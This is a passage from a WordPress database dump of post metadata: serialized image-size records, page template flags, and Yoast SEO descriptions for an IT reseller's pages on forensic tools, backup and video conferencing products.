:4:\"file\";s:45:\"Public-health-studies_370px-x-300px-20x16.png\";s:5:\"width\";i:20;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2188,1931,'_wp_attached_file','2018/12/Research-grant-funding_370px-x-300px.png'),(2189,1931,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:370;s:6:\"height\";i:300;s:4:\"file\";s:48:\"2018/12/Research-grant-funding_370px-x-300px.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Research-grant-funding_370px-x-300px-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Research-grant-funding_370px-x-300px-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"Research-grant-funding_370px-x-300px-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:48:\"Research-grant-funding_370px-x-300px-370x300.png\";s:5:\"width\";i:370;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"Research-grant-funding_370px-x-300px-20x16.png\";s:5:\"width\";i:20;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2190,1844,'_wp_attachment_image_alt','Winrar Logo'),(2191,1504,'_thumbnail_id','1844'),(2192,1932,'_wp_attached_file','2018/12/Finding-the-best-minds_370px-x-300px.png'),(2193,1932,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:370;s:6:\"height\";i:300;s:4:\"file\";s:48:\"2018/12/Finding-the-best-minds_370px-x-300px.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Finding-the-best-minds_370px-x-300px-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Finding-the-best-minds_370px-x-300px-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"Finding-the-best-minds_370px-x-300px-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:48:\"Finding-the-best-minds_370px-x-300px-370x300.png\";s:5:\"width\";i:370;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"Finding-the-best-minds_370px-x-300px-20x16.png\";s:5:\"width\";i:20;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2194,1845,'_wp_attachment_image_alt','Zoom Logo'),(2195,1506,'_thumbnail_id','1845'),(2196,1506,'_yoast_wpseo_content_score','60'),(2197,1421,'_yoast_wpseo_metadesc','Live Forensic Solution for Quick Response'),(2198,1421,'_yoast_wpseo_content_score','60'),(2199,1425,'_yoast_wpseo_metadesc','Forensic Cooperation Analysis Tool'),(2200,1425,'_yoast_wpseo_content_score','30'),(2201,1426,'_yoast_wpseo_metadesc','Digital data security inspection system'),(2202,1426,'_yoast_wpseo_content_score','60'),(2203,1942,'_wp_attached_file','2018/12/qator_summary_new.png'),(2204,1942,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:167;s:4:\"file\";s:29:\"2018/12/qator_summary_new.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"qator_summary_new-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"qator_summary_new-300x72.png\";s:5:\"width\";i:300;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"qator_summary_new-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"qator_summary_new-480x167.png\";s:5:\"width\";i:480;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:29:\"qator_summary_new-640x167.png\";s:5:\"width\";i:640;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"qator_summary_new-20x5.png\";s:5:\"width\";i:20;s:6:\"height\";i:5;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2205,1944,'_edit_lock','1569205157:1'),(2206,1944,'_edit_last','1'),(2207,1944,'_yoast_wpseo_content_score','60'),(2208,1943,'_edit_lock','1545380091:1'),(2209,1943,'_edit_last','1'),(2210,1943,'_wp_page_template','template-fullwidth.php'),(2211,1943,'_hide_page_title',''),(2212,1943,'_hide_header',''),(2213,1943,'_hide_footer',''),(2214,1943,'_hide_breadcrumb',''),(2215,1943,'_cover',''),(2216,1943,'_show_excerpt',''),(2217,1943,'_wc_apply_product',''),(2218,1943,'_yoast_wpseo_content_score','60'),(2219,1575,'_yoast_wpseo_content_score','60'),(2220,1575,'_yoast_wpseo_focuskw','Qator Enterprise'),(2221,1575,'_yoast_wpseo_metadesc','REMOTE FORENSIC ANALYSIS & SECURITY INCIDENT MANAGEMENT SOLUTION'),(2222,1575,'_yoast_wpseo_linkdex','62'),(2223,1948,'_wp_attached_file','2018/12/Qator_big.png'),(2224,1948,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:239;s:6:\"height\";i:300;s:4:\"file\";s:21:\"2018/12/Qator_big.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Qator_big-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Qator_big-239x300.png\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Qator_big-239x150.png\";s:5:\"width\";i:239;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Qator_big-239x300.png\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Qator_big-16x20.png\";s:5:\"width\";i:16;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2225,1439,'_yoast_wpseo_content_score','30'),(2226,1600,'_yoast_wpseo_content_score','60'),(2227,1600,'_yoast_wpseo_focuskw','Synology'),(2228,1600,'_yoast_wpseo_metadesc','Data is the lifeblood of business. When accidents or hardware failures result in data loss, productivity drops and your business suffers. Traditional backup strategies present challenges like long recovery times or extraneous storage consumption. Your business needs a smart backup strategy to effectively protect against all threats and keep operations running smoothly.'),(2229,1600,'_yoast_wpseo_linkdex','66'),(2230,1960,'_wp_attached_file','2018/12/Teamviewer-page.png'),(2231,1960,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:352;s:4:\"file\";s:27:\"2018/12/Teamviewer-page.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Teamviewer-page-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Teamviewer-page-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"Teamviewer-page-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"Teamviewer-page-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"Teamviewer-page-640x352.png\";s:5:\"width\";i:640;s:6:\"height\";i:352;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"Teamviewer-page-20x10.png\";s:5:\"width\";i:20;s:6:\"height\";i:10;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2232,1605,'_yoast_wpseo_content_score','60'),(2237,1608,'_yoast_wpseo_content_score','60'),(2238,1633,'_yoast_wpseo_content_score','60'),(2239,1976,'_wp_attached_file','2018/12/Teamviewer-page-1.png'),(2240,1976,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:352;s:4:\"file\";s:29:\"2018/12/Teamviewer-page-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Teamviewer-page-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Teamviewer-page-1-300x151.png\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"Teamviewer-page-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"Teamviewer-page-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:29:\"Teamviewer-page-1-640x352.png\";s:5:\"width\";i:640;s:6:\"height\";i:352;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2241,1977,'_wp_attached_file','2018/12/gotowebinar.png'),(2242,1977,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:577;s:6:\"height\";i:396;s:4:\"file\";s:23:\"2018/12/gotowebinar.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"gotowebinar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"gotowebinar-300x206.png\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"gotowebinar-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"gotowebinar-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"gotowebinar-20x14.png\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2267,16,'_yoast_wpseo_focuskw','Video Conferencing'),(2268,16,'_yoast_wpseo_title','Video Conferencing, Web Conferencing, Video Conferencing Systems | Logitech'),(2269,16,'_yoast_wpseo_metadesc','Logitech has your video conference needs covered with HD webcams, video conference systems, and headsets. Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.'),(2270,16,'_yoast_wpseo_linkdex','57'),(2271,2000,'_edit_lock','1551680461:1'),(2272,2000,'_edit_last','1'),(2273,2000,'_wp_page_template','template-fullwidth.php'),(2274,2000,'_hide_page_title',''),(2275,2000,'_hide_header',''),(2276,2000,'_hide_footer',''),(2277,2000,'_hide_breadcrumb',''),(2278,2000,'_cover',''),(2279,2000,'_show_excerpt',''),(2280,2000,'_wc_apply_product',''),(2281,2000,'_yoast_wpseo_metadesc','Logitech GROUP Video Conferencing System for mid to large rooms. Affordable video conferencing for mid to large-sized meeting rooms.'),(2282,2000,'_yoast_wpseo_content_score','60'),(2283,2003,'_edit_lock','1545009566:1'),(2284,2003,'_edit_last','1'),(2285,2003,'_wp_page_template','template-fullwidth.php'),(2286,2003,'_hide_page_title',''),(2287,2003,'_hide_header',''),(2288,2003,'_hide_footer',''),(2289,2003,'_hide_breadcrumb',''),(2290,2003,'_cover',''),(2291,2003,'_show_excerpt',''),(2292,2003,'_wc_apply_product',''),(2293,2003,'_yoast_wpseo_content_score','60'),(2294,2010,'_wp_attached_file','2018/12/gototraining-1.jpg'),(2295,2010,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:539;s:4:\"file\";s:26:\"2018/12/gototraining-1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"gototraining-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"gototraining-1-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"gototraining-1-768x404.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"gototraining-1-1024x539.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:539;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"gototraining-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"gototraining-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"gototraining-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"gototraining-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2296,2011,'_wp_attached_file','2018/12/gototraining-2.jpg'),(2297,2011,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:397;s:4:\"file\";s:26:\"2018/12/gototraining-2.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"gototraining-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"gototraining-2-300x116.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"gototraining-2-768x298.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"gototraining-2-1024x397.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:397;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"gototraining-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"gototraining-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"gototraining-2-640x397.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:397;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"gototraining-2-20x8.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:8;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2298,1634,'_yoast_wpseo_content_score','60'),(2299,2014,'_wp_attached_file','2018/12/1.jpg'),(2300,2014,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1060;s:6:\"height\";i:560;s:4:\"file\";s:13:\"2018/12/1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x406.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:406;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"1-1024x541.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:13:\"1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:13:\"1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:13:\"1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:11:\"1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2301,2015,'_wp_attached_file','2018/12/2.png'),(2302,2015,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1564;s:6:\"height\";i:871;s:4:\"file\";s:13:\"2018/12/2.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x167.png\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x428.png\";s:5:\"width\";i:768;s:6:\"height\";i:428;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"2-1024x570.png\";s:5:\"width\";i:1024;s:6:\"height\";i:570;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:13:\"2-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:13:\"2-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:13:\"2-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:11:\"2-20x11.png\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2303,2016,'_wp_attached_file','2018/12/3.jpg'),(2304,2016,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1060;s:6:\"height\";i:560;s:4:\"file\";s:13:\"2018/12/3.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"3-768x406.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:406;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"3-1024x541.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:13:\"3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:13:\"3-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:13:\"3-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:11:\"3-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2305,2017,'_wp_attached_file','2018/12/4.jpg'),(2306,2017,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1050;s:6:\"height\";i:560;s:4:\"file\";s:13:\"2018/12/4.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"4-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"4-768x410.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"4-1024x546.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:546;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blo